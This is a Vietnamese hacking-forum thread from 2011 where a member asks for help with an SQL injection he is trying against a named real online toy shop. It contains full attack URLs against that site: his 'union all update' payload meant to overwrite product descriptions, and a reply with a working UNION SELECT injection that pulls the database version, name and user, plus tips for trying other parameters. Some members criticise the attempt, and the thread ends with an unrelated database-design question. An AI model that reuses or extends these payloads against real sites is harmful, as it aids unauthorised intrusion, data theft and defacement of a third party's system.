Giúp em về câu lệnh SQL - .:: HVAOnline ::.

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận thâm nhập

Giúp em về câu lệnh SQL

[Question] Giúp em về câu lệnh SQL	14/06/2011 10:14:00 (+0700) \| #1 \| 240710

xdvkxdvk
Member

Joined: 23/05/2007 10:13:58
Messages: 27
Offline

tình hình là em mò đc 1 trang dính lỗi SQL ịnection
đã mò ra tên chính xác 1 table với tên của 3 colum trong table đó
table: products gồm 10 colum nhưng em mới mò đc 3 colum thongtin,gia,trangthai
có 1 đièu lạ là khi sử dụng lệnh update lại không đc chấp nhận
li8nk khai thác
http://www.vuongquocdochoi.vn/home.php?act=product&kh=110614101345&mn=71&sub_id=273&id=607&product_id=607&cid=380 union all update products set thongtin='Site cua ban bi mac loi SQL injection' where gia=99000

anh chị có thể chỉ cho em câu lệnh trên có sai ở đâu không

[Question] Giúp em về câu lệnh SQL	16/06/2011 08:14:12 (+0700) \| #2 \| 241008

yeucodon
Member

Joined: 22/03/2008 11:25:51
Messages: 39
Offline

bạn định làm gì với site này mà lại viết thế cậu lênh sai rồi nên đọc lại SQL đi mà cậu có thể email cho admin mà k nên dùng cách này ảnh hưởng đến công việc của người ta

sống trong đời sống, cần có một tấm lòng

[Question] Giúp em về câu lệnh SQL	16/06/2011 08:17:10 (+0700) \| #3 \| 241009

conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline

Không hiểu sao lắm người thích SQL injection mà không biết SQL statement thế nào là đúng, thế nào là sai. Sao lúc nào cũng muốn đốt giai đoạn và tự tạo lỗ hổng lung tung rồi thắc mắc?

What bringing us together is stronger than what pulling us apart.

[Question] Giúp em về câu lệnh SQL	20/06/2011 07:22:22 (+0700) \| #4 \| 241435

chiro8x
Member

Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline

conmale wrote:

Không hiểu sao lắm người thích SQL injection mà không biết SQL statement thế nào là đúng, thế nào là sai. Sao lúc nào cũng muốn đốt giai đoạn và tự tạo lỗ hổng lung tung rồi thắc mắc?

Đơn giản là vì mọi người muốn làm "hắc-cờ" đấy anh conmale thay vì học SQL người ta toàn tìm hiểu về SQL ịnection, Thay vì tìm hiểu về mạng máy tính người ta tìm hiểu Denial Of Service. Thay vì học lập trình người ta tìm hiểu về virus máy tính. Kết quả là có nhiều người có kiến thức "chuyên môn" nhưng hơi thiếu "căn bản" smilie

while(1){}

[Question] Giúp em về câu lệnh SQL	20/06/2011 08:14:35 (+0700) \| #5 \| 241440

xdvkxdvk
Member

Joined: 23/05/2007 10:13:58
Messages: 27
Offline

conmale wrote:

Không hiểu sao lắm người thích SQL injection mà không biết SQL statement thế nào là đúng, thế nào là sai. Sao lúc nào cũng muốn đốt giai đoạn và tự tạo lỗ hổng lung tung rồi thắc mắc?

chào anh conmale. kiến thức thì newbie như em chưa thể bằng anh đc, ý em với vấn đề trên là, làm thế nào để chèn cái câu truy vấn update để thực thi đc. vì em đã thử nhiều cách nhưng vì database nó dùng là MySQL nên có thể trong kỹ thuật injection sẽ có khác biệt gì chăng ?

còn việc bạn kia nói mình "phá "thì cũng chưa đúng vì đơn giản mình đã công khai link web thì trước sau sẽ có người thông báo cho admin thôi. cái mình muốn là các bậc tiền bối chia sẻ kinh nghiệm cho newbie (ít ra là hướng đi thôi, hoặc chỉ cho tụi em cái sai) chứ trách newbie như tụi em làm gì.
đọc câu title của box này mà thấy hài
Thảo luận thâm nhập [ 100 viewing ]
"Dành cho các thảo luận liên quan đến thâm nhập. "

đồng ý là các newbie chưa có nhìêu kinh nghiệm thực tiễn, nên mới lên đây để xin các anh chị chia sẻ kinh nghiệm
nhưng như những người muốn tìm hiểu nó thì đọc và chỉ đọc thì có ích gì khi ko có hướng đi để thực hành những gì mình đã học smilie

[Question] Giúp em về câu lệnh SQL	20/06/2011 10:43:49 (+0700) \| #6 \| 241460

chiro8x
Member

Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline

Việc cậu dùng SQL injection mà cậu được học và lôi thông tin từ database người ta ra công bố trên một forum đáng được tuyên dương smilie

.
Code:

http://sqltutorials.blogspot.com/2007/06/sql-union-all.html
Có thời gian thì đọc.

UNION ALL để gộp tất cả các kết quả từ 2 bảng UPDATE thì không trả về kết quả nào >_<!. Vì đây là lỗi cú pháp (syntax error) nên MySQL không thực thi nó.

while(1){}

[Question] Giúp em về câu lệnh SQL	25/06/2011 21:14:36 (+0700) \| #7 \| 242108

vanganh16p
Member

Joined: 25/06/2011 06:37:36
Messages: 2
Offline

các anh ơi giúp em cái này cái :

em có 2 bảng A và B với 2 primary key tương ứng là a,b.

trong B có chứa a và trong A có chứa b ( các FK này có thể null).

Từ 1 value biết trước trong bảng A, có thể nào query tất cả dữ liệu của 2 bảng A,B liên quan với quan hệ ở trên ko?

[Question] Giúp em về câu lệnh SQL	26/06/2011 14:16:48 (+0700) \| #8 \| 242137

vanganh16p
Member

Joined: 25/06/2011 06:37:36
Messages: 2
Offline

hic ko ai biết à smilie

(

[Question] Giúp em về câu lệnh SQL	30/06/2011 15:05:56 (+0700) \| #9 \| 242463

bula87
Member

Joined: 09/11/2007 18:56:38
Messages: 3
Offline

1 kinh nghiệm là khi khai thác link sql ban đầu không được thì nên kiếm 1 link khác thử xem sao...
ở đây mình chọn link này :

Code:

http://www.vuongquocdochoi.vn/home.php?act=mtc&mn=70

thông tin về site :

Code:

http://www.vuongquocdochoi.vn/home.php?act=mtc&mn=-70%20union%20select%201,concat_ws%28version%28%29,0x3a,database%28%29,0x3a,user%28%29%29,3,4,5,6--%20-

từ đây bạn làm tiếp nhé.

thanks all

[Question] Giúp em về câu lệnh SQL	01/07/2011 01:57:35 (+0700) \| #10 \| 242513

thuypv
Member

Joined: 11/06/2008 12:25:57
Messages: 64
Offline

@xdvkxdvk

Mình đọc câu lệnh của bạn mà mình cũng không hiểu gì luôn, hiểu được ý đồ của bạn, nhưng có lẽ bạn đang sai trong câu lệnh

Đầu tiên mình phân tích các cái sai của bạn nha (Mình không dành về MySQL và PHP lắm, nhưng mình sẽ mô tả bằng C# và SQL server)

Thứ 1: cái CID khi họ lấy về, theo mình nghĩ nó là dạng số, vì thế họ requet.querystring về, sẽ conver sang kiểu số thì 1 chuỗi dài rằng rặc đàng sau của bạn, nó không thoả mãn vì thế sẽ bị lỗi ngay

Thứ 2: đặt trường hợp nó là dạng chuỗi đi

khi đó câu lệnh có thể là

select * from abc where cid = '380 union all update products set thongtin='Site cua ban bi mac loi SQL injection' where gia=99000'

bạn xem đoạn mã trên sai rồi đúng không?

Thứ 3: đặt trường hợp sau 380 bạn cho thêm 1 dấu ' và giá trị cid vẫn là 1 chuỗi, thì đoạn lệnh sau sẽ như thế này

select * from abc where cid = '380' union all update products set thongtin='Site cua ban bi mac loi SQL injection' where gia=99000'

Thì câu lệnh này vẫn sai

Bạn thử khai thác thêm xem thế nào, bạn tìm 1 giá trị nào đó mà giá trị trả về sẽ là dạng chuỗi rồi thử xem thế nào

[Question] Giúp em về câu lệnh SQL	01/07/2011 02:03:23 (+0700) \| #11 \| 242514

thuypv
Member

Joined: 11/06/2008 12:25:57
Messages: 64
Offline

vanganh16p wrote:

các anh ơi giúp em cái này cái :

em có 2 bảng A và B với 2 primary key tương ứng là a,b.

trong B có chứa a và trong A có chứa b ( các FK này có thể null).

Từ 1 value biết trước trong bảng A, có thể nào query tất cả dữ liệu của 2 bảng A,B liên quan với quan hệ ở trên ko?

Chưa gặp 1 dạng thiết kế bảng rối rắm như thế này bao giờ, có thể nó dùng trong 1 trường hợp đặc biệt nào đó (đoạn bôi mầu đỏ)

Thường thì 1 bảng chính 1 bản phụ (Tức là trong A có chứa b, nhưng trong B sẽ ko có A)

Hoặc là sinh ra 1 bảng trung gian tức là 1 bảng AB trong bảng này có 2 trường a, b là khoá chính

bảng này sẽ quan hệ với 2 bảng ban đầu, tức là A quan hệ 1 nhiều với AB và B quan hệ 1 nhiều với AB

Go to:

Users currently in here
1 Anonymous